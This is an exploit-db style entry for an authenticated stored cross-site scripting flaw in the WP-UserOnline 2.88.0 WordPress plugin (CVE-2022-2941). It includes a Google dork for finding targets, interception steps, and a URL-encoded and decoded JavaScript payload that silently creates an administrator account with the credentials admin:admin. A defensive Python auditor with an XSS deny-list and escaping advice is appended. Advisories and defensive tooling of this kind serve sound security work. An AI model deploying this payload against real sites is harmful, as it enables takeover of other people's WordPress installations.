WP-UserOnline 2.88.0 – Stored Cross Site Scripting (XSS) (Authenticated)

  • Author: Onur Göğebakan
  • Date: 2024-06-14
  • Source: https://www.exploit-db.com/exploits/52048/
# Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-useronline/
# Date: 2024-06-12
# Exploit Author: Onur Göğebakan
# Vendor Homepage: https://github.com/lesterchan/wp-useronline
# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
# Category: Web Application
# Version: 2.88.0
# Tested on: WordPress 6.5.4 - Windows 10
# CVE : CVE-2022-2941

# Explanation:
The value of the plugin's `naming[bots]` setting is stored and later rendered on the User Online dashboard page without escaping. An authenticated user who can save the plugin's settings can therefore store a script that runs in the browser of any user who views that page; the payload below uses this to add a new administrator account to WordPress.

# Exploit:
1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings
2. Click Save and intercept the request.
3. Replace the value of the `naming%5Bbots%5D` parameter with the payload below:
```
%3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E
```
4. The payload executes when a user visits http://poc.test/wp-admin/index.php?page=useronline
5. An administrator user is created with the credentials admin:admin.

# Decoded payload
```javascript
function handleResponse() {
    // Extract the create-user nonce from the fetched user-new.php page
    var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('POST', '/wp-admin/user-new.php', true);
    changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    // Submit the "Add New User" form using the viewing user's session and nonce
    var params = 'action=createuser&_wpnonce_create-user=' + nonce +
        '&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' +
        '&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User';
    changeReq.send(params);
}

// Load user-new.php first; handleResponse runs once the page has been fetched
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/wp-admin/user-new.php', true);
req.send();
```
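From the defender's side, the root cause above is a free-text setting that is stored and echoed back as HTML. The following is an added example, not part of this exploit-db entry and not the WP-UserOnline plugin's code: it decodes a captured form field the way a proxy shows it, flags stored-XSS markup in the value, and shows that escaping on output turns the same value into inert text. The sample values are constructed for the example and only the `naming[bots]` parameter name comes from the entry; the `MARKUP_PATTERNS` list is an assumption about what a plain-text naming setting should never contain.

```python
"""Audit a submitted WordPress plugin setting for stored-XSS markup.

Added example, not part of the exploit-db entry or the WP-UserOnline plugin.
"""
import html
import re
from urllib.parse import unquote_plus

# Assumed deny-list for a setting that should only ever hold plain text
# (bot names). Any hit means the value must not reach the page unescaped.
MARKUP_PATTERNS = [
    re.compile(r"<\s*/?\s*script\b", re.I),              # <script> / </script>
    re.compile(r"<\s*[a-z][^>]*\son[a-z]+\s*=", re.I),   # inline event handler attribute
    re.compile(r"javascript\s*:", re.I),                 # javascript: URL scheme
    re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I),
]


def decode_form_value(raw: str) -> str:
    """Decode one application/x-www-form-urlencoded field as captured in a proxy."""
    return unquote_plus(raw)


def find_markup(value: str) -> list[str]:
    """Return the patterns (as strings) that match the decoded value."""
    return [p.pattern for p in MARKUP_PATTERNS if p.search(value)]


def audit_setting(raw_value: str) -> dict:
    """Decode a captured field and report whether it carries markup."""
    decoded = decode_form_value(raw_value)
    hits = find_markup(decoded)
    return {"decoded": decoded, "suspicious": bool(hits), "matched": hits}


def render_as_text(value: str) -> str:
    """Escape on output so the browser shows the setting as text, not HTML.

    This is the Python equivalent of escaping with WordPress's esc_html()
    before echoing a stored option into the admin page.
    """
    return html.escape(value, quote=True)


# Constructed sample values for the naming[bots] field (not from the entry).
CONSTRUCTED_VALUES = {
    "benign": "Googlebot%2C+Bingbot",
    "scripted": "%3Cscript%3E+var+req+%3D+new+XMLHttpRequest%28%29%3B+%3C%2Fscript%3E",
    "handler": "Bot%3Cimg+src%3Dx+onerror%3Dx%3E",
}


if __name__ == "__main__":
    for label, raw in CONSTRUCTED_VALUES.items():
        report = audit_setting(raw)
        print(f"{label:9s} suspicious={report['suspicious']} "
              f"decoded={report['decoded']!r}")
        # Even a flagged value is harmless once it is escaped on output.
        print(f"{'':9s} rendered={render_as_text(report['decoded'])!r}")
```

Run the script to see each constructed value decoded, flagged or cleared, and then escaped; `find_markup` applied to the escaped form of a flagged value returns nothing, which is the property the plugin's output path needs. In the plugin itself the corresponding fix is to sanitize the option on save (for example with `sanitize_text_field()`) and escape it on output (`esc_html()`), and an auditor can point `audit_setting` at the value exported from the stored option to confirm nothing hostile is already persisted.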